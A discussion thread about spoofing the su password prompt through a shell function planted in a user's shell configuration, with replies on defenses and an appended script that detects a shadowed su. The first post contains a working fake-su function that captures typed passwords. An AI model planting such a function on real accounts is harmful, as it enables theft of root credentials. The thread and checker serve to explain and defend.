su exploit

su is secure as long as your account is not compromised.
Consider the following code:

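su () {
    # Fake su: prints the usual prompt and collects the typed characters in R
    N=`printf "\n"`
    printf "Password: "
    while ((1)); do
        read -n 1 V
        case $V in $N) break;; esac    # stop when Enter is read
        printf "\e[D \e[D"             # erase the echoed character
        R=$R$V
    done
    echo $R is incorrect password
}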

To prevent this, .bashrc, .bash_profile and .inputrc (write a macro
which, when any key is pressed, replaces it with the code above + cleanup
chars + changes the keymap), and perhaps all configs, should be owned by
root. The same applies to your scripts, because spawning a new bash, when
you don't forget to set PS1, and kill -9 the parent is easy.

I am generally against prompting for a password when logged in. You can't
be sure that you are giving it to the proper application. (I bet that
wvista would be full of malware: install_rootkit(msgbox("you need admin
password for this task")) )

Re: su exploit

This is a well known and very old issue.  The same can be applied to the
login program, which prompts for your username and password.  That could
be actually a trojan program running under a normal user account.  I
solve this problem by using the SAK (Secure Access Key) feature of
Linux, which SIGKILLs every process running in the current terminal.  On
the VT, init(8) would then start a real getty process.  But then, we
still have keyboard wiretaps ...

That's not enough at all.  There are too many opportunities for an
attacker to write such a shell function (or something similar, like a
shell-script called 'su').

As shown above, prompting for (static) passwords is problematic in all
cases, not only when logged in.  In that case it's even less dangerous,
because if someone can intercept your password while logged in, then the
actual problem is most likely somewhere else.

Most secure would be variable passwords or key-based authentication,
which can be done locally, too (e.g. smart-cards, where the key is never
revealed to the actual system).
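
A quick check for the shadowing discussed in this thread (a shell function, alias or script named su that is found before the real binary), added here as an example and not written by either poster. The names classify_cmd, owner_ok, check_cmd and TRUSTED_UID are made up for the example, and it assumes the real binary and its directory are owned by uid 0:

```shell
#!/bin/sh
# Added example: report whether NAME (e.g. su) would run something other than
# a root-owned binary in the current shell session.
TRUSTED_UID=${TRUSTED_UID:-0}   # assumption: privileged binaries belong to uid 0

# Print how the current shell resolves NAME: alias, function-or-builtin,
# file:<path>, or missing. Relies on the POSIX "command -v" output formats.
classify_cmd() {
    resolved=$(command -v "$1" 2>/dev/null) || { echo missing; return 0; }
    case $resolved in
        "alias "*) echo alias ;;
        /*)        echo "file:$resolved" ;;
        *)         echo function-or-builtin ;;
    esac
}

# Succeed only if PATHNAME is owned by TRUSTED_UID and is not writable by
# group or others (-H follows a symlink given on the command line).
owner_ok() {
    [ -n "$(find -H "$1" -prune -user "$TRUSTED_UID" \
            ! -perm -020 ! -perm -002 2>/dev/null)" ]
}

# Print a verdict for NAME; return 0 only when it resolves to a file that,
# together with its directory, passes owner_ok.
check_cmd() {
    kind=$(classify_cmd "$1")
    case $kind in
        file:*)
            file=${kind#file:}
            if owner_ok "$file" && owner_ok "$(dirname "$file")"; then
                echo "OK: $1 -> $file"; return 0
            fi
            echo "SUSPECT: $1 -> $file (owner or mode not trusted)"; return 1 ;;
        *)  echo "SUSPECT: $1 resolves to: $kind"; return 1 ;;
    esac
}

# Usage inside the session you want to inspect:  check_cmd su
```

A session that is already compromised can shadow command or find as well, so a clean result here is a quick check and not proof.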

